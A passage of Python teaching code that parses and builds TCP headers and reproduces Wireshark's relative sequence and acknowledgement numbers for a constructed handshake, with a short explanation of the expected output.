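        raise ValueError("segment shorter than the 20-byte minimum header")
    # bits 0-15 src port, 16-31 dst port, 32-63 seq, 64-95 ack, 96-99 data offset,
    # then reserved bits + 9 flag bits, window, checksum, urgent pointer
    sport, dport, seq, ack, off_flags, _win, _csum, _urg = struct.unpack("!HHIIHHHH", segment[:20])
    data_offset = off_flags >> 12            # header length in 32-bit words, 5..15
    header_len = data_offset * 4
    if not 5 <= data_offset <= 15 or header_len > len(segment):
        raise ValueError(f"invalid data offset {data_offset}")
    flags = off_flags & 0x1FF
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "header_len": header_len, "options": segment[20:header_len],
            "syn": bool(flags & SYN), "ack_flag": bool(flags & ACK),
            "payload": segment[header_len:]}

def build_segment(sport, dport, seq, ack, flags, options=b"", payload=b""):
    """Build a segment; options are padded to a 32-bit boundary (the Padding field)."""
    options += b"\x00" * (-len(options) % 4)
    data_offset = 5 + len(options) // 4
    fixed = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (data_offset << 12) | flags, 65535, 0, 0)
    return fixed + options + payload

def relative_numbers(segments):
    """Recompute the relative seq/ack numbers Wireshark shows: each side's ISN (from its SYN)
    is subtracted from its later seq numbers and from the peer's ack numbers.
    Simplification: sides are keyed by port only, which is enough for one connection."""
    isn, out = {}, []
    for seg in segments:
        h = parse_tcp_header(seg)
        if h["syn"]:
            isn[h["sport"]] = h["seq"]
        rel_seq = h["seq"] - isn[h["sport"]]
        rel_ack = h["ack"] - isn[h["dport"]] if h["ack_flag"] else 0
        out.append((rel_seq, rel_ack))
    return out

# Constructed handshake between client port 34054 and server port 80; A and B are made-up ISNs.
A, B = 0x1A2B3C4D, 0x9F000001
MSS = b"\x02\x04\x05\xb4"                    # MSS option (kind 2, len 4, 1460): 4 bytes, no padding needed
HANDSHAKE = [
    build_segment(34054, 80, A, 0, SYN, options=MSS),          # 1: SYN, seq = A
    build_segment(80, 34054, B, A + 1, SYN | ACK),              # 2: SYN-ACK, seq = B, ack = A + 1
    build_segment(34054, 80, A + 1, B + 1, ACK),                # 3: ACK, seq = A + 1
    build_segment(34054, 80, A + 1, B + 1, ACK, payload=b"GET / HTTP/1.1\r\n"),  # first payload byte is ISN + 1
]
```

relative_numbers(HANDSHAKE) yields (0, 0), (0, 1), (1, 1), (1, 1), the same relative values Wireshark prints for a handshake and its first data segment.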